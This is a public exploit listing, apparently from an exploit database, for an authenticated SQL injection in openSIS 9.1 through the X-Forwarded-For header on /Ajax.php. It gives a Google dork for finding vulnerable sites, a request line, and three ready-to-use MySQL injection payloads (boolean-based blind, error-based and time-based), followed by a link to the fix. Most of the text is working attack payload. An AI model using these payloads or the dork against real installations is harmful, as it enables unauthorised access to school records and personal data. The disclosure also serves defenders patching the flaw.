Share
## https://sploitus.com/exploit?id=PACKETSTORM:181989
# Exploit Title: openSIS 9.1 - SQLi (Authenticated)  
# Google Dork: intext:"openSIS is a product"  
# Date: 09.09.2024  
# Exploit Author: Devrim Dıragumandan (d0ub1edd)  
# Vendor Homepage: https://www.os4ed.com/  
# Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1  
# Version: 9.1  
# Tested on: Linux  
  
A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in POST request sent to /Ajax.php.   
  
GET /Ajax.php?modname=x HTTP/1.1  
  
---  
Parameter: X-Forwarded-For #1* ((custom) HEADER)  
Type: boolean-based blind  
Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)  
Payload: 127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG  
  
Type: error-based  
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)  
Payload: 127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: 127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae  
---   
  
FIX: https://github.com/OS4ED/openSIS-Classic/pull/322